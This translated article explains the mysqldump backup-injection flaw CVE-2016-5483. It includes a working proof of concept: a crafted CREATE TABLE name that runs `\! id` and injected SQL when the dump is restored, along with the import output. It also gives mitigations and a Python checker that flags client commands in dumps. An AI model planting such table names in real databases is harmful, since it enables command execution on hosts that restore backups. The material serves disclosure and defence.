How Hackers Exploit mysqldump Backups to Execute System Commands

This article explains how attackers can abuse mysqldump to embed malicious SQL that runs system commands during import, demonstrates the exploit step‑by‑step, and provides practical mitigation measures such as using --skip-comments and revoking CREATE TABLE privileges.

Java High-Performance Architecture

1. Introduction

mysqldump is the standard tool for backing up MySQL databases: it writes a SQL script of DROP TABLE, CREATE TABLE and INSERT statements, with each table preceded by a comment header that names it. An attacker who can create a table can choose a name that, once written into that comment header, is no longer a comment. When the dump is imported with the mysql client, the attacker's lines are executed as SQL and, through the client's `\!` command, as operating-system commands on the host doing the restore.

2. Experiment

Scenario Assumption

1) The attacker already has application-level access and can run arbitrary SQL, for example through a compromised WordPress installation.

2) The attacker's database account holds the CREATE privilege. This is often granted inadvertently at installation time, e.g. with GRANT ALL PRIVILEGES ON wordpress.* to the application user.

3) A routine backup is taken with mysqldump and later restored with the mysql client.

4) The attacker's goal is to escalate from database access to OS-level command execution on the host where the dump is imported.

Process

First, the attacker creates a table whose name contains newlines; the client command and the injected SQL each need to start on a line of their own:

CREATE TABLE `evil
\! id
select user(),@@version/*` (test text);

Then the database is dumped with mysqldump. For an ordinary table the dump contains a three-line comment header:

--
-- Table structure for table `tablename`
--

For the malicious table the name spans the header, which now reads:

--
-- Table structure for table `evil
\! id
select user(),@@version/*`
--

Only the first two lines are still comments. The third line begins with `\!`, the mysql client's `system` command, so the client runs `id` in a shell on the importing host. The fourth line is sent to the server as SQL; its trailing `/*` opens a block comment that swallows the closing backtick, the rest of the header and the DROP TABLE statement that follows, until the next `*/` in the dump, after which the statement terminates and the SELECT executes.

The dump is imported back:

mysql test < test.dump

The output shows that both the system command and the injected query ran:

uid=1000(mysql5.7) gid=1000(mysql5.7) group=1000(mysql5.7)
user()  @@version
root@localhost 5.7.17-log

Thus the attacker successfully runs system commands. Note that the `id` output is that of the account running the mysql client, not the server: the command executes on whichever host restores the backup, with the privileges of the operator who does so.

3. Mitigation

Run mysqldump with --skip-comments. The comment header is what turns the table name into top-level lines; without it the name only appears inside backticks in the DROP TABLE and CREATE TABLE statements, where the client treats it as a quoted identifier.

Revoke the CREATE privilege from accounts that do not need it. An account that cannot create tables cannot plant the name; where an application needs CREATE for installs or upgrades, grant it for that window rather than permanently.

Dump only table data when possible (mysqldump --no-create-info). The per-table data section still carries a "Dumping data for table" comment header that names the table, so combine this with --skip-comments rather than relying on it alone.

Before restoring a dump taken from a less-trusted database, inspect it for lines beginning with `\!` or `system` that sit outside comments and quoted identifiers, and perform restores as an unprivileged user on an isolated host, since `\!` runs with the importing user's privileges.

The original post lists the affected products as MySQL (all versions), MariaDB (≤5.5.52 and <10.1) and Percona Server (all versions) at the time of writing; the issue was assigned CVE-2016-5483, so check your vendor's release notes for fixed versions rather than relying on that list.
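The dump layout from the Process section and the pre-import check called for in the mitigations, as one added example that is not code from the original post or from MySQL: `table_block` is a constructed approximation of what mysqldump writes around one table, and `client_commands` is a simplified model of how the mysql client scans a dump, tracking quoted identifiers and block comments. Names and the exact whitespace are assumptions noted in the comments.

```python
# Added example, not code from the original post or from MySQL: a model of the
# per-table block mysqldump writes and of how the mysql client scans a dump,
# reused as a pre-import check. The layout in table_block() is reconstructed
# from ordinary mysqldump 5.7 output and is an approximation (the character-set
# SET statements around CREATE TABLE are reduced to one line).

def table_block(name, skip_comments=False):
    """Return the part of a mysqldump output that mentions table `name`.
    With skip_comments=True (mysqldump --skip-comments) the header is absent
    and the name survives only inside backticks."""
    header = "" if skip_comments else (
        "--\n-- Table structure for table `%s`\n--\n\n" % name)
    return (header
            + "DROP TABLE IF EXISTS `%s`;\n" % name
            + "/*!40101 SET @saved_cs_client     = @@character_set_client */;\n"
            + "CREATE TABLE `%s` (\n  `test` text\n) ENGINE=InnoDB;\n" % name)

# Client-side commands that `mysql` runs itself instead of sending to the
# server: \! / system execute a shell command, \. / source read and execute
# another file. Neither belongs in a dump, so a restore should refuse them.
CLIENT_COMMANDS = ("\\!", "system ", "\\.", "source ")

def client_commands(dump):
    """Return (line_no, line) for every line the mysql client would execute
    as a client command.

    Simplified model of the client's scanner: a line counts only when it
    starts with one of CLIENT_COMMANDS while the scanner is outside a quoted
    string or identifier and outside a /* ... */ block; comment lines are
    discarded in that state. The real client also honours \\! in the middle
    of a line, so an empty result is a necessary check, not proof of safety.
    """
    found = []
    in_quote = None      # "'", '"' or '`' while inside a literal or identifier
    in_block = False     # inside /* ... */
    for no, line in enumerate(dump.splitlines(), 1):
        if in_quote is None and not in_block:
            if line == "--" or line.startswith("-- ") or line.startswith("#"):
                continue                          # discarded as a comment
            if line.startswith(CLIENT_COMMANDS):
                found.append((no, line))          # executed on the client host
                continue
        i = 0
        while i < len(line):                      # track quote/comment state
            ch, two = line[i], line[i:i + 2]
            if in_block:
                if two == "*/":
                    in_block = False
                    i += 1
            elif in_quote:
                if ch == "\\" and in_quote != "`":
                    i += 1                        # skip the escaped character
                elif ch == in_quote:
                    in_quote = None
            else:
                if two == "/*":
                    in_block = True
                    i += 1
                elif ch in "'\"`":
                    in_quote = ch
            i += 1
    return found

def safe_to_import(dump):
    """True when no line of the dump would be run as a client command."""
    return not client_commands(dump)

# The article's table name as actually created: the client command and the
# injected SELECT each start on a line of their own.
EVIL = "evil\n\\! id\nselect user(),@@version/*"

if __name__ == "__main__":
    for name in ("tablename", EVIL):
        for skip in (False, True):
            flag = "--skip-comments" if skip else "default"
            print("%-10s %-16s %s" % (name.split("\n")[0], flag,
                                      client_commands(table_block(name, skip))))
```

Running it shows that the default dump of the evil table yields exactly one executed line, the `\! id` on line 3 of the header, while the --skip-comments dump yields none, because the only places the name still appears are inside backticks. The second `\! id`, inside the DROP TABLE statement, is not flagged either: it falls within the block comment opened by the injected `/*`, which is also why the SELECT runs only once. Use `safe_to_import` as a gate before `mysql < dump`, and treat a non-empty result as a hard stop rather than an empty one as a guarantee.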

4. Summary

This article, translated from https://blog.tarq.io/cve-2016-5483-backdooring-mysqldump-backups, demonstrates a backdoor technique that rides on the comment headers mysqldump writes for each table, and lists practical mitigations: strip the comments, withhold CREATE from application accounts, and inspect dumps before restoring them.
